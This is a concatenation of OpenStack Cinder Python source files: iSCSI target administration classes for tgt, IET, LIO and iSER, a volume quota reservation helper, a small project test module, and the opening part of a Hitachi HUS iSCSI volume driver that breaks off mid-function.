    # Per-volume persist-file contents consumed by `tgt-admin --update`.
    # %s slots: target IQN, backing-store path (and, in the CHAP variant,
    # the chap auth line).
    VOLUME_CONF = """
<target %s>
backing-store %s
lld iscsi
</target>
"""
    VOLUME_CONF_WITH_CHAP_AUTH = """
<target %s>
backing-store %s
lld iscsi
%s
</target>
"""

    def __init__(self, root_helper, volumes_dir,
                 target_prefix='iqn.2010-10.org.openstack:',
                 execute=putils.execute):
        super(TgtAdm, self).__init__('tgtadm', root_helper, execute)
        # Prefix prepended to a volume id to form its full IQN.
        self.iscsi_target_prefix = target_prefix
        # Directory holding one persist file per exported volume; tgtd must
        # be configured to include it.
        self.volumes_dir = volumes_dir

    def _get_target(self, iqn):
        """Return the tid for *iqn* from `tgt-admin --show`, or None."""
        (out, err) = self._execute('tgt-admin', '--show', run_as_root=True)
        lines = out.split('\n')
        for line in lines:
            if iqn in line:
                parsed = line.split()
                tid = parsed[1]
                # Strip the trailing ':' from the "Target <tid>:" token.
                return tid[:-1]
        return None

    def _verify_backing_lun(self, iqn, tid):
        """Return True when target *tid* exposes its backing store (LUN 1)."""
        backing_lun = True
        capture = False
        target_info = []
        (out, err) = self._execute('tgt-admin', '--show', run_as_root=True)
        lines = out.split('\n')
        for line in lines:
            # Capture only the section of output belonging to this target.
            if iqn in line and "Target %s" % tid in line:
                capture = True
            if capture:
                target_info.append(line)
            if iqn not in line and 'Target ' in line:
                capture = False
        # NOTE(review): this is an exact whole-line membership test against
        # the captured lines, not a substring scan -- it only matches when a
        # line is literally ' LUN: 1'. Presumably a per-line substring check
        # was intended; confirm against real tgt-admin output.
        if ' LUN: 1' not in target_info:
            backing_lun = False
        return backing_lun

    def _recreate_backing_lun(self, iqn, tid, name, path):
        """Best-effort re-creation of LUN 1 when it failed to appear."""
        LOG.warning(_('Attempting recreate of backing lun...'))
        # Since we think the most common case of this is a dev busy
        # (create vol from snapshot) we're going to add a sleep here
        # this will hopefully give things enough time to stabilize
        # how long should we wait?? I have no idea, let's go big
        # and error on the side of caution
        time.sleep(10)
        try:
            (out, err) = self._execute('tgtadm', '--lld', 'iscsi',
                                       '--op', 'new', '--mode',
                                       'logicalunit', '--tid',
                                       tid, '--lun', '1', '-b',
                                       path, run_as_root=True)
            LOG.debug('StdOut from recreate backing lun: %s' % out)
            LOG.debug('StdErr from recreate backing lun: %s' % err)
        except putils.ProcessExecutionError as e:
            # Best effort: log the failure, caller re-verifies the LUN.
            LOG.error(_("Failed to recover attempt to create "
                        "iscsi backing lun for volume "
                        "id:%(vol_id)s: %(e)s")
                      % {'vol_id': name, 'e': e})

    def create_iscsi_target(self, name, tid, lun, path,
                            chap_auth=None, **kwargs):
        """Write the persist file for *name* and create the target via tgt-admin.

        Returns the tid of the created target; raises
        ISCSITargetCreateFailed (cleaning up the persist file) on failure.
        """
        # Note(jdg) tid and lun aren't used by TgtAdm but remain for
        # compatibility
        fileutils.ensure_tree(self.volumes_dir)
        vol_id = name.split(':')[1]
        if chap_auth is None:
            volume_conf = self.VOLUME_CONF % (name, path)
        else:
            volume_conf = self.VOLUME_CONF_WITH_CHAP_AUTH % (name,
                                                             path, chap_auth)
        LOG.info(_('Creating iscsi_target for: %s') % vol_id)
        volumes_dir = self.volumes_dir
        volume_path = os.path.join(volumes_dir, vol_id)
        # NOTE(review): plain open/close rather than a `with` block -- an
        # exception in write() would leak the handle.
        f = open(volume_path, 'w+')
        f.write(volume_conf)
        f.close()
        LOG.debug('Created volume path %(vp)s,\n'
                  'content: %(vc)s'
                  % {'vp': volume_path, 'vc': volume_conf})
        # Track a renamed volume's previous persist file for cleanup below.
        old_persist_file = None
        old_name = kwargs.get('old_name', None)
        if old_name is not None:
            old_persist_file = os.path.join(volumes_dir, old_name)
        try:
            # with the persistent tgts we create them
            # by creating the entry in the persist file
            # and then doing an update to get the target
            # created.
            (out, err) = self._execute('tgt-admin', '--update', name,
                                       run_as_root=True)
            LOG.debug("StdOut from tgt-admin --update: %s", out)
            LOG.debug("StdErr from tgt-admin --update: %s", err)
            # Grab targets list for debug
            # Consider adding a check for lun 0 and 1 for tgtadm
            # before considering this as valid
            (out, err) = self._execute('tgtadm',
                                       '--lld',
                                       'iscsi',
                                       '--op',
                                       'show',
                                       '--mode',
                                       'target',
                                       run_as_root=True)
            LOG.debug("Targets after update: %s" % out)
        except putils.ProcessExecutionError as e:
            LOG.warning(_("Failed to create iscsi target for volume "
                          "id:%(vol_id)s: %(e)s")
                        % {'vol_id': vol_id, 'e': e})
            # Don't forget to remove the persistent file we created
            os.unlink(volume_path)
            raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
        iqn = '%s%s' % (self.iscsi_target_prefix, vol_id)
        tid = self._get_target(iqn)
        if tid is None:
            LOG.error(_("Failed to create iscsi target for volume "
                        "id:%(vol_id)s. Please ensure your tgtd config file "
                        "contains 'include %(volumes_dir)s/*'") % {
                            'vol_id': vol_id,
                            'volumes_dir': volumes_dir, })
            raise exception.NotFound()
        # NOTE(jdg): Sometimes we have some issues with the backing lun
        # not being created, believe this is due to a device busy
        # or something related, so we're going to add some code
        # here that verifies the backing lun (lun 1) was created
        # and we'll try and recreate it if it's not there
        if not self._verify_backing_lun(iqn, tid):
            try:
                self._recreate_backing_lun(iqn, tid, name, path)
            except putils.ProcessExecutionError:
                os.unlink(volume_path)
                raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
            # Finally check once more and if no go, fail and punt
            if not self._verify_backing_lun(iqn, tid):
                os.unlink(volume_path)
                raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
        if old_persist_file is not None and os.path.exists(old_persist_file):
            # The volume was renamed: drop the stale persist file.
            os.unlink(old_persist_file)
        return tid

    def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
        """Delete the target for *vol_name* and remove its persist file."""
        LOG.info(_('Removing iscsi_target for: %s') % vol_id)
        vol_uuid_file = vol_name
        volume_path = os.path.join(self.volumes_dir, vol_uuid_file)
        if not os.path.exists(volume_path):
            # Nothing exported for this volume: treat as already removed.
            LOG.warning(_('Volume path %s does not exist, '
                          'nothing to remove.') % volume_path)
            return
        if os.path.isfile(volume_path):
            iqn = '%s%s' % (self.iscsi_target_prefix,
                            vol_uuid_file)
        else:
            raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
        try:
            # NOTE(vish): --force is a workaround for bug:
            #             https://bugs.launchpad.net/cinder/+bug/1159948
            self._execute('tgt-admin',
                          '--force',
                          '--delete',
                          iqn,
                          run_as_root=True)
        except putils.ProcessExecutionError as e:
            LOG.error(_("Failed to remove iscsi target for volume "
                        "id:%(vol_id)s: %(e)s")
                      % {'vol_id': vol_id, 'e': e})
            raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
        # NOTE(jdg): There's a bug in some versions of tgt that
        # will sometimes fail silently when using the force flag
        # https://bugs.launchpad.net/ubuntu/+source/tgt/+bug/1305343
        # For now work-around by checking if the target was deleted,
        # if it wasn't, try again without the force.
        # This will NOT do any good for the case of multiple sessions
        # which the force was aded for but it will however address
        # the cases pointed out in bug:
        # https://bugs.launchpad.net/cinder/+bug/1304122
        if self._get_target(iqn):
            try:
                LOG.warning(_('Silent failure of target removal '
                              'detected, retry....'))
                self._execute('tgt-admin',
                              '--delete',
                              iqn,
                              run_as_root=True)
            except putils.ProcessExecutionError as e:
                LOG.error(_("Failed to remove iscsi target for volume "
                            "id:%(vol_id)s: %(e)s")
                          % {'vol_id': vol_id, 'e': e})
                raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
        # NOTE(jdg): This *should* be there still but incase
        # it's not we don't care, so just ignore it if was
        # somehow deleted between entry of this method
        # and here
        if os.path.exists(volume_path):
            os.unlink(volume_path)
        else:
            LOG.debug('Volume path %s not found at end, '
                      'of remove_iscsi_target.' % volume_path)

    def show_target(self, tid, iqn=None, **kwargs):
        """Verify a target exists for *iqn*; raise NotFound otherwise."""
        if iqn is None:
            raise exception.InvalidParameterValue(
                err=_('valid iqn needed for show_target'))
        tid = self._get_target(iqn)
        if tid is None:
            raise exception.NotFound()
class IetAdm(TargetAdmin):
    """iSCSI target administration using ietadm (iSCSI Enterprise Target).

    Runtime changes go through ``ietadm``; in addition, the persistent
    IET configuration file (default ``/etc/iet/ietd.conf``) is kept in
    sync so that targets survive a daemon restart.
    """

    def __init__(self, root_helper, iet_conf='/etc/iet/ietd.conf',
                 iscsi_iotype='fileio', execute=putils.execute):
        super(IetAdm, self).__init__('ietadm', root_helper, execute)
        self.iet_conf = iet_conf
        self.iscsi_iotype = iscsi_iotype

    def _is_block(self, path):
        # True when path refers to a block device rather than a file.
        mode = os.stat(path).st_mode
        return stat.S_ISBLK(mode)

    def _iotype(self, path):
        # 'auto' derives the IET IO mode from the backing store type;
        # any other configured value is used verbatim.
        if self.iscsi_iotype == 'auto':
            return 'blockio' if self._is_block(path) else 'fileio'
        else:
            return self.iscsi_iotype

    @contextlib.contextmanager
    def temporary_chown(self, path, owner_uid=None):
        """Temporarily chown a path.

        :params path: The path to chown
        :params owner_uid: UID of temporary owner (defaults to current user)
        """
        if owner_uid is None:
            owner_uid = os.getuid()
        orig_uid = os.stat(path).st_uid
        if orig_uid != owner_uid:
            putils.execute('chown', owner_uid, path,
                           root_helper=self._root_helper, run_as_root=True)
        try:
            yield
        finally:
            # Always restore the original owner, even on error.
            if orig_uid != owner_uid:
                putils.execute('chown', orig_uid, path,
                               root_helper=self._root_helper,
                               run_as_root=True)

    def create_iscsi_target(self, name, tid, lun, path,
                            chap_auth=None, **kwargs):
        """Create the target plus LUN 0 and persist them in the conf file.

        :param name: target name ('<prefix>:<volume id>')
        :param chap_auth: optional 'type user password' CHAP triple
        :returns: the target id used
        :raises: ISCSITargetCreateFailed on command failure
        """
        # NOTE (jdg): Address bug: 1175207
        kwargs.pop('old_name', None)
        self._new_target(name, tid, **kwargs)
        self._new_logicalunit(tid, lun, path, **kwargs)
        if chap_auth is not None:
            (type, username, password) = chap_auth.split()
            self._new_auth(tid, type, username, password, **kwargs)
        conf_file = self.iet_conf
        if os.path.exists(conf_file):
            try:
                volume_conf = """
                        Target %s
                            %s
                            Lun 0 Path=%s,Type=%s
                """ % (name, chap_auth, path, self._iotype(path))
                with self.temporary_chown(conf_file):
                    # FIX: use a context manager so the file handle is
                    # closed even when the write fails (the original
                    # leaked the open handle on that path).
                    with open(conf_file, 'a+') as f:
                        f.write(volume_conf)
            except putils.ProcessExecutionError as e:
                vol_id = name.split(':')[1]
                LOG.error(_("Failed to create iscsi target for volume "
                            "id:%(vol_id)s: %(e)s")
                          % {'vol_id': vol_id, 'e': e})
                raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
        return tid

    def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
        """Delete LUN and target, then scrub the persistent conf file."""
        LOG.info(_('Removing iscsi_target for volume: %s') % vol_id)
        self._delete_logicalunit(tid, lun, **kwargs)
        self._delete_target(tid, **kwargs)
        vol_uuid_file = vol_name
        conf_file = self.iet_conf
        if os.path.exists(conf_file):
            with self.temporary_chown(conf_file):
                # FIX: the original opened the file inside a try whose
                # finally called iet_conf_text.close(); when open()
                # itself failed, the name was unbound and the finally
                # raised NameError, masking the real error.  A 'with'
                # block closes the handle safely in every case.
                with open(conf_file, 'r+') as iet_conf_text:
                    full_txt = iet_conf_text.readlines()
                    new_iet_conf_txt = []
                    count = 0
                    for line in full_txt:
                        if count > 0:
                            # Still skipping the stanza matched below.
                            count -= 1
                            continue
                        elif re.search(vol_uuid_file, line):
                            # Matched this volume's Target line: drop it
                            # and the two lines that follow it.
                            count = 2
                            continue
                        else:
                            new_iet_conf_txt.append(line)
                    # Rewrite the file in place with the stanza removed.
                    iet_conf_text.seek(0)
                    iet_conf_text.truncate(0)
                    iet_conf_text.writelines(new_iet_conf_txt)

    def _new_target(self, name, tid, **kwargs):
        # ietadm --op new --tid=<tid> --params Name=<name>
        self._run('--op', 'new',
                  '--tid=%s' % tid,
                  '--params', 'Name=%s' % name,
                  **kwargs)

    def _delete_target(self, tid, **kwargs):
        self._run('--op', 'delete',
                  '--tid=%s' % tid,
                  **kwargs)

    def show_target(self, tid, iqn=None, **kwargs):
        # iqn is unused here; IET shows targets by tid.
        self._run('--op', 'show',
                  '--tid=%s' % tid,
                  **kwargs)

    def _new_logicalunit(self, tid, lun, path, **kwargs):
        self._run('--op', 'new',
                  '--tid=%s' % tid,
                  '--lun=%d' % lun,
                  '--params', 'Path=%s,Type=%s' % (path, self._iotype(path)),
                  **kwargs)

    def _delete_logicalunit(self, tid, lun, **kwargs):
        self._run('--op', 'delete',
                  '--tid=%s' % tid,
                  '--lun=%d' % lun,
                  **kwargs)

    def _new_auth(self, tid, type, username, password, **kwargs):
        # Register incoming (initiator-facing) CHAP credentials.
        self._run('--op', 'new',
                  '--tid=%s' % tid,
                  '--user',
                  '--params=%s=%s,Password=%s' % (type, username, password),
                  **kwargs)
class FakeIscsiHelper(object):
    """Minimal stand-in for a target admin, used by the unit tests.

    It tracks nothing but a monotonically increasing target id and an
    injected ``execute`` callable.
    """

    def __init__(self):
        self.tid = 1
        self._execute = None

    def set_execute(self, execute):
        # Inject the command runner used by code under test.
        self._execute = execute

    def create_iscsi_target(self, *args, **kwargs):
        # Hand out the next target id; all arguments are ignored.
        self.tid = self.tid + 1
        return self.tid
class LioAdm(TargetAdmin):
    """iSCSI target administration for LIO using python-rtslib.

    All work is delegated to the external ``cinder-rtstool`` helper,
    which is verified to be present at construction time.
    """

    def __init__(self, root_helper, lio_initiator_iqns='',
                 iscsi_target_prefix='iqn.2010-10.org.openstack:',
                 execute=putils.execute):
        super(LioAdm, self).__init__('cinder-rtstool', root_helper, execute)
        self.iscsi_target_prefix = iscsi_target_prefix
        self.lio_initiator_iqns = lio_initiator_iqns
        # Fail fast if the helper tool is missing or broken.
        self._verify_rtstool()

    def _verify_rtstool(self):
        """Raise if cinder-rtstool is not installed/usable."""
        try:
            self._execute('cinder-rtstool', 'verify')
        except (OSError, putils.ProcessExecutionError):
            LOG.error(_('cinder-rtstool is not installed correctly'))
            raise

    def _get_target(self, iqn):
        """Return the 'get-targets' output line containing iqn, or None."""
        (out, err) = self._execute('cinder-rtstool',
                                   'get-targets',
                                   run_as_root=True)
        lines = out.split('\n')
        for line in lines:
            if iqn in line:
                return line
        return None

    def create_iscsi_target(self, name, tid, lun, path,
                            chap_auth=None, **kwargs):
        """Create a LIO target for the volume named in *name*.

        :param name: '<prefix>:<volume id>'; the volume id is parsed out
        :returns: the matching get-targets line for the new target
        :raises: ISCSITargetCreateFailed / NotFound on failure
        """
        # tid and lun are not used
        vol_id = name.split(':')[1]
        LOG.info(_('Creating iscsi_target for volume: %s') % vol_id)
        # rtstool requires chap_auth, but unit tests don't provide it
        chap_auth_userid = 'test_id'
        chap_auth_password = '<PASSWORD>'
        if chap_auth is not None:
            # chap_auth is 'type user password'; drop the leading type.
            (chap_auth_userid, chap_auth_password) = chap_auth.split(' ')[1:]
        extra_args = []
        if self.lio_initiator_iqns:
            extra_args.append(self.lio_initiator_iqns)
        try:
            command_args = ['cinder-rtstool',
                            'create',
                            path,
                            name,
                            chap_auth_userid,
                            chap_auth_password]
            if extra_args:
                command_args.extend(extra_args)
            self._execute(*command_args, run_as_root=True)
        except putils.ProcessExecutionError as e:
            LOG.error(_("Failed to create iscsi target for volume "
                        "id:%s.") % vol_id)
            LOG.error("%s" % e)
            raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
        # Verify the target actually appeared before declaring success.
        iqn = '%s%s' % (self.iscsi_target_prefix, vol_id)
        tid = self._get_target(iqn)
        if tid is None:
            LOG.error(_("Failed to create iscsi target for volume "
                        "id:%s.") % vol_id)
            raise exception.NotFound()
        return tid

    def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
        """Delete the LIO target for the given volume name."""
        LOG.info(_('Removing iscsi_target: %s') % vol_id)
        vol_uuid_name = vol_name
        iqn = '%s%s' % (self.iscsi_target_prefix, vol_uuid_name)
        try:
            self._execute('cinder-rtstool',
                          'delete',
                          iqn,
                          run_as_root=True)
        except putils.ProcessExecutionError as e:
            LOG.error(_("Failed to remove iscsi target for volume "
                        "id:%s.") % vol_id)
            LOG.error("%s" % e)
            raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)

    def show_target(self, tid, iqn=None, **kwargs):
        """Verify a target exists by iqn (tid is unused for lookup).

        :raises: InvalidParameterValue when iqn is missing
        :raises: NotFound when no target matches
        """
        if iqn is None:
            raise exception.InvalidParameterValue(
                err=_('valid iqn needed for show_target'))
        tid = self._get_target(iqn)
        if tid is None:
            raise exception.NotFound()

    def initialize_connection(self, volume, connector):
        """Allow the connector's initiator iqn access to the volume's target.

        :raises: ISCSITargetAttachFailed when the ACL update fails
        """
        # provider_location is '<portal> <iqn> ...'; take the iqn field.
        volume_iqn = volume['provider_location'].split(' ')[1]
        (auth_method, auth_user, auth_pass) = \
            volume['provider_auth'].split(' ', 3)
        # Add initiator iqns to target ACL
        try:
            self._execute('cinder-rtstool', 'add-initiator',
                          volume_iqn,
                          auth_user,
                          auth_pass,
                          connector['initiator'],
                          run_as_root=True)
        except putils.ProcessExecutionError:
            LOG.error(_("Failed to add initiator iqn %s to target") %
                      connector['initiator'])
            raise exception.ISCSITargetAttachFailed(volume_id=volume['id'])
class ISERTgtAdm(TgtAdm):
    """iSER (iSCSI Extensions for RDMA) target administration.

    Reuses all of TgtAdm's behavior; only the persisted target stanza
    templates (``driver iser``) and the default IQN prefix differ.
    """
    # Template for a target without CHAP authentication:
    # (target name, backing store path)
    VOLUME_CONF = """
<target %s>
    driver iser
    backing-store %s
</target>
"""
    # Template with CHAP: (target name, backing store path, auth line)
    VOLUME_CONF_WITH_CHAP_AUTH = """
<target %s>
    driver iser
    backing-store %s
    %s
</target>
"""

    def __init__(self, root_helper, volumes_dir,
                 target_prefix='iqn.2010-10.org.iser.openstack:',
                 execute=putils.execute):
        super(ISERTgtAdm, self).__init__(root_helper, volumes_dir,
                                         target_prefix, execute)
|
adelina-t/cinder | cinder/quota_utils.py | <filename>cinder/quota_utils.py
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder import quota
LOG = logging.getLogger(__name__)
QUOTAS = quota.QUOTAS
def get_volume_type_reservation(ctxt, volume, type_id):
    """Reserve quota (volume count and gigabytes) for a typed volume.

    :param ctxt: request context; its project_id scopes the quota check
    :param volume: volume dict; only 'size' (GB) is read here
    :param type_id: volume type id, used to add per-type quota options
    :returns: list of reservations to be committed or rolled back later
    :raises: VolumeSizeExceedsAvailableQuota when the gigabytes quota
             would be exceeded, VolumeLimitExceeded for the volume count
    """
    # Reserve quotas for the given volume type
    try:
        reserve_opts = {'volumes': 1, 'gigabytes': volume['size']}
        QUOTAS.add_volume_type_opts(ctxt,
                                    reserve_opts,
                                    type_id)
        reservations = QUOTAS.reserve(ctxt, **reserve_opts)
    except exception.OverQuota as e:
        # OverQuota carries the offending resources plus current state.
        overs = e.kwargs['overs']
        usages = e.kwargs['usages']
        quotas = e.kwargs['quotas']

        def _consumed(name):
            # Both reserved and in-use amounts count against the limit.
            return (usages[name]['reserved'] + usages[name]['in_use'])

        # Translate the generic OverQuota into a specific, user-facing
        # exception depending on which resource went over.
        for over in overs:
            if 'gigabytes' in over:
                s_size = volume['size']
                d_quota = quotas[over]
                d_consumed = _consumed(over)
                msg = _("Quota exceeded for %(s_pid)s, tried to create "
                        "%(s_size)sG volume - (%(d_consumed)dG of "
                        "%(d_quota)dG already consumed)")
                LOG.warn(msg % {'s_pid': ctxt.project_id,
                                's_size': s_size,
                                'd_consumed': d_consumed,
                                'd_quota': d_quota})
                raise exception.VolumeSizeExceedsAvailableQuota(
                    requested=s_size, quota=d_quota, consumed=d_consumed)
            elif 'volumes' in over:
                msg = _("Quota exceeded for %(s_pid)s, tried to create "
                        "volume (%(d_consumed)d volumes "
                        "already consumed)")
                LOG.warn(msg % {'s_pid': ctxt.project_id,
                                'd_consumed': _consumed(over)})
                raise exception.VolumeLimitExceeded(
                    allowed=quotas[over])
    return reservations
|
adelina-t/cinder | cinder/tests/test_misc.py |
# Copyright 2010 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import glob
import os
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder import test
class ExceptionTestCase(test.TestCase):
    """Sanity checks on the cinder.exception module."""

    @staticmethod
    def _raise_exc(exc):
        raise exc()

    def test_exceptions_raise(self):
        """Every exception class must be raisable without kwargs."""
        # NOTE(dprince): disable format errors since we are not passing kwargs
        self.flags(fatal_exception_format_errors=False)
        attrs = (getattr(exception, attr_name) for attr_name in dir(exception))
        for exc_class in (a for a in attrs if isinstance(a, type)):
            self.assertRaises(exc_class, self._raise_exc, exc_class)
class ProjectTestCase(test.TestCase):
    """Source-tree level checks on the cinder repository."""

    def test_all_migrations_have_downgrade(self):
        """Every DB migration defining upgrade() must define downgrade()."""
        topdir = os.path.normpath(os.path.dirname(__file__) + '/../../')
        py_glob = os.path.join(topdir, "cinder", "db", "sqlalchemy",
                               "migrate_repo", "versions", "*.py")
        missing_downgrade = []
        for path in glob.iglob(py_glob):
            with open(path, "r") as migration_file:
                contents = migration_file.readlines()
            has_upgrade = any('def upgrade(' in line for line in contents)
            has_downgrade = any('def downgrade(' in line for line in contents)
            if has_upgrade and not has_downgrade:
                missing_downgrade.append(os.path.basename(path))
        helpful_msg = (_("The following migrations are missing a downgrade:"
                         "\n\t%s") % '\n\t'.join(sorted(missing_downgrade)))
        self.assertFalse(missing_downgrade, msg=helpful_msg)
|
adelina-t/cinder | cinder/volume/drivers/hds/hds.py | # Copyright (c) 2013 Hitachi Data Systems, Inc.
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
iSCSI Cinder Volume driver for Hitachi Unified Storage (HUS) platform.
"""
from oslo.config import cfg
from xml.etree import ElementTree as ETree
from cinder import exception
from cinder.openstack.common import excutils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder import utils
from cinder.volume import driver
from cinder.volume.drivers.hds.hus_backend import HusBackend
HDS_VERSION = '1.0.2'
LOG = logging.getLogger(__name__)
HUS_OPTS = [
cfg.StrOpt('hds_cinder_config_file',
default='/opt/hds/hus/cinder_hus_conf.xml',
help='The configuration file for the Cinder HDS driver '
'for HUS'), ]
CONF = cfg.CONF
CONF.register_opts(HUS_OPTS)
HI_IQN = 'iqn.1994-04.jp.co.hitachi:' # fixed string, for now.
HUS_DEFAULT_CONFIG = {'hus_cmd': 'hus-cmd',
'lun_start': '0',
'lun_end': '8192'}
def factory_bend():
    """Factory over-ride in self-tests."""
    # Indirection point: tests replace this to inject a fake backend.
    return HusBackend()
def _loc_info(loc):
"""Parse info from location string."""
info = {}
tup = loc.split(',')
if len(tup) < 5:
info['id_lu'] = tup[0].split('.')
return info
info['id_lu'] = tup[2].split('.')
info['tgt'] = tup
return info
def _do_lu_range_check(start, end, maxlun):
    """Validate array allocation range.

    :param start: first LU number (string, per _read_config)
    :param end: last LU number (string)
    :param maxlun: array's maximum LU number (string)
    :returns: (start, end) with end clamped to maxlun if it was larger
    :raises: InvalidInput when the range is negative, inverted, or
             start is at/past the array maximum
    """
    LOG.debug("Range: start LU: %(start)s, end LU: %(end)s"
              % {'start': start,
                 'end': end})
    if int(start) < 0:
        msg = 'start LU limit too low: ' + start
        raise exception.InvalidInput(reason=msg)
    if int(start) >= int(maxlun):
        msg = 'start LU limit high: ' + start + ' max: ' + maxlun
        raise exception.InvalidInput(reason=msg)
    if int(end) <= int(start):
        msg = 'LU end limit too low: ' + end
        raise exception.InvalidInput(reason=msg)
    if int(end) > int(maxlun):
        # Clamp rather than reject: the array simply has fewer LUs.
        end = maxlun
        LOG.debug("setting LU upper (end) limit to %s" % maxlun)
    return (start, end)
def _xml_read(root, element, check=None):
    """Read an xml element.

    :param root: parsed ElementTree root to search under
    :param element: tag or path passed to findtext
    :param check: truthy means the element is mandatory; a missing or
                  empty value then raises ParameterNotFound
    :returns: stripped element text, or None when absent/empty and not
              mandatory
    """
    try:
        val = root.findtext(element)
        LOG.info(_("%(element)s: %(val)s")
                 % {'element': element,
                    'val': val})
        if val:
            return val.strip()
        if check:
            raise exception.ParameterNotFound(param=element)
        return None
    except ETree.ParseError:
        # Malformed XML: fatal only for mandatory elements.
        if check:
            with excutils.save_and_reraise_exception():
                LOG.error(_("XML exception reading parameter: %s") % element)
        else:
            LOG.info(_("XML exception reading parameter: %s") % element)
            return None
def _read_config(xml_config_file):
    """Read hds driver specific xml config file.

    :param xml_config_file: path to the driver's XML configuration
    :returns: dict holding management IPs/credentials, per-volume-type
              'services', the 'hdp' pool map, snapshot pool and LU range
    :raises: NotFound when the file is missing or unparseable,
             ParameterNotFound when a mandatory element is absent or no
             service section is configured
    """
    try:
        root = ETree.parse(xml_config_file).getroot()
    except Exception:
        raise exception.NotFound(message='config file not found: '
                                 + xml_config_file)
    config = {}
    arg_prereqs = ['mgmt_ip0', 'mgmt_ip1', 'username', 'password']
    for req in arg_prereqs:  # mandatory parameters
        config[req] = _xml_read(root, req, 'check')
    config['hdp'] = {}
    config['services'] = {}
    for svc in ['svc_0', 'svc_1', 'svc_2', 'svc_3']:  # min one needed
        if _xml_read(root, svc) is None:
            continue
        service = {}
        service['label'] = svc
        for arg in ['volume_type', 'hdp', 'iscsi_ip']:  # none optional
            service[arg] = _xml_read(root, svc + '/' + arg, 'check')
        config['services'][service['volume_type']] = service
        config['hdp'][service['hdp']] = service['hdp']
    # FIX: the original tested "config['services'].keys() is None",
    # which is never true (dict.keys() is never None), so a config with
    # zero services slipped through.  Test for emptiness instead.
    if not config['services']:  # at least one service required!
        raise exception.ParameterNotFound(param="No service found")
    config['snapshot_hdp'] = _xml_read(root, 'snapshot/hdp', 'check')
    for arg in ['hus_cmd', 'lun_start', 'lun_end']:  # optional
        config[arg] = _xml_read(root, arg) or HUS_DEFAULT_CONFIG[arg]
    return config
class HUSDriver(driver.ISCSIDriver):
    """HDS HUS volume driver.

    All array operations are delegated to self.bend (a HusBackend, or a
    fake in self-tests) which wraps the external 'hus-cmd' tool; every
    call passes the management IPs and credentials from the XML config.
    The 'hds_hus' interprocess lock serializes array-mutating calls.
    """
    VERSION = HDS_VERSION

    def _array_info_get(self):
        """Get array parameters.

        :returns: (array id, 'hus_<id>' name, max LU number) — field
                  positions in the hus-cmd output are assumed; TODO
                  confirm against the tool's output format.
        """
        out = self.bend.get_version(self.config['hus_cmd'],
                                    HDS_VERSION,
                                    self.config['mgmt_ip0'],
                                    self.config['mgmt_ip1'],
                                    self.config['username'],
                                    self.config['password'])
        inf = out.split()
        return(inf[1], 'hus_' + inf[1], inf[6])

    def _get_iscsi_info(self):
        """Validate array iscsi parameters.

        :returns: dict keyed by portal IP with 'ctl', 'port' and
                  'iscsi_port' for each iSCSI portal the array reports
        """
        out = self.bend.get_iscsi_info(self.config['hus_cmd'],
                                       HDS_VERSION,
                                       self.config['mgmt_ip0'],
                                       self.config['mgmt_ip1'],
                                       self.config['username'],
                                       self.config['password'])
        lines = out.split('\n')
        conf = {}  # dict based on iSCSI portal ip addresses
        for line in lines:
            if 'CTL' in line:
                inf = line.split()
                (ctl, port, ip, ipp) = (inf[1], inf[3], inf[5], inf[7])
                conf[ip] = {}
                conf[ip]['ctl'] = ctl
                conf[ip]['port'] = port
                conf[ip]['iscsi_port'] = ipp  # HUS default: 3260
                msg = _('portal: %(ip)s:%(ipp)s, CTL: %(ctl)s, port: %(port)s')
                LOG.debug(msg
                          % {'ip': ip,
                             'ipp': ipp,
                             'ctl': ctl,
                             'port': port})
        return conf

    def _get_service(self, volume):
        """Get the available service parameters for a given volume type.

        :returns: (iscsi_ip, iscsi_port, ctl, port, hdp) tuple for the
                  volume's type, falling back to the 'default' service
        :raises: ParameterNotFound when the type has no configured service
        """
        label = None
        if volume['volume_type']:
            label = volume['volume_type']['name']
        label = label or 'default'
        if label in self.config['services'].keys():
            svc = self.config['services'][label]
            service = (svc['iscsi_ip'], svc['iscsi_port'], svc['ctl'],
                       svc['port'], svc['hdp'])  # ip, ipp, ctl, port, hdp
        else:
            LOG.error(_("No configuration found for service: %s") % label)
            raise exception.ParameterNotFound(param=label)
        return service

    def _get_stats(self):
        """Get HDP stats from HUS.

        Sums capacity/usage (reported in MB) over the configured HDP
        pools only, and converts to GB for the scheduler.
        """
        total_cap = 0
        total_used = 0
        out = self.bend.get_hdp_info(self.config['hus_cmd'],
                                     HDS_VERSION,
